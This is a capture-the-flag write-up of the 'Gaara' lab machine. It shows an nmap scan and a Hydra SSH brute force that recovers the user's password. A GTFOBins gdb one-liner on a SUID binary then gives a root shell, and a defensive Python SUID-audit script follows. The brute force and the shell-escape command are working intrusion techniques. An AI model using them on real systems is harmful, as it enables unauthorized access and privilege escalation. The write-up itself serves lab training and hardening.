Key points
- Hydra brute force
- SUID privilege escalation
Steps
Run nmap to see which ports and services are open. It is straightforward: only 22 and 80.
Nmap scan report for 192.168.171.142
Host is up (0.40s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_ 256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-title: Gaara
|_http-server-header: Apache/2.4.38 (Debian)
Neither directory brute-forcing nor nikto turned up anything of value, so the only thing left was to focus on SSH brute-forcing. There is one very obvious username here: gaara.
Brute-forcing with hydra successfully recovered the password iloveyou2.
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-26 12:03:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task
[DATA] attacking ssh://192.168.171.142:22/
[STATUS] 212.00 tries/min, 212 tries in 00:01h, 9790 to do in 00:47h, 14 active
[STATUS] 195.67 tries/min, 587 tries in 00:03h, 9415 to do in 00:49h, 14 active
[STATUS] 187.14 tries/min, 1310 tries in 00:07h, 8692 to do in 00:47h, 14 active
[STATUS] 183.73 tries/min, 2756 tries in 00:15h, 7247 to do in 00:40h, 13 active
[STATUS] 178.03 tries/min, 5519 tries in 00:31h, 4484 to do in 00:26h, 13 active
[22][ssh] host: 192.168.171.142 login: gaara password: iloveyou2
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-26 12:38:38
After logging in to the remote server over SSH, search for files with the SUID bit set. This turns up gdb and gimp-2.10; following the GTFOBins hints, privilege escalation goes smoothly (although gimp-2.10 gave me an error here: Cannot open display).
gaara@Gaara:~$ find / -type f -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/gdb
/usr/bin/sudo
/usr/bin/gimp-2.10
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/mount
/usr/bin/umount
gaara@Gaara:~$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
# cat /root/proof.txt
3f46819ec9e47edc98319b4dbf48e311
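As an added defender-side check (example code written for this page, not part of the writeup), the SUID listing above can be audited against an expected baseline: anything outside the baseline is reported, and interpreter-capable binaries such as gdb and gimp, which GTFOBins documents, get their own reason. The Debian 10 baseline and the shell-capable list are assumptions to tune for your own golden image.

```python
import os
import stat
from pathlib import PurePosixPath

# Assumed baseline (not from the writeup): SUID binaries on a stock Debian 10 install.
DEBIAN10_SUID_BASELINE = frozenset({
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/bin/sudo", "/usr/bin/fusermount", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/su", "/usr/bin/passwd",
    "/usr/bin/mount", "/usr/bin/umount",
})

# Assumed list of programs that embed an interpreter or can spawn a shell; SUID on
# any of these hands root to every local user (gdb and gimp in this writeup).
SHELL_CAPABLE = frozenset({"gdb", "gimp", "python", "python3", "perl", "vim", "find", "env"})

# Constructed sample: abridged from the find output in this writeup, prompt included.
SAMPLE_LISTING = """\
gaara@Gaara:~$ find / -type f -perm -4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/bin/gdb
/usr/bin/sudo
/usr/bin/gimp-2.10
"""

def collect_suid(root="/"):
    # Live equivalent of `find / -type f -perm -4000`; lstat so symlinks are not followed.
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entries are skipped, like 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path

def audit_suid(listing, baseline=DEBIAN10_SUID_BASELINE):
    # Return (path, reason) for every SUID file that is not in the baseline.
    findings = []
    for line in listing.splitlines():
        path = line.strip()
        if not path.startswith("/") or path in baseline:
            continue  # skip the prompt/command echo and expected entries
        stem = PurePosixPath(path).name.split("-")[0]  # gimp-2.10 -> gimp
        reason = "shell-capable binary" if stem in SHELL_CAPABLE else "not in baseline"
        findings.append((path, reason))
    return findings
```

On a live host, `audit_suid("\n".join(collect_suid()))` performs the same comparison against the real filesystem.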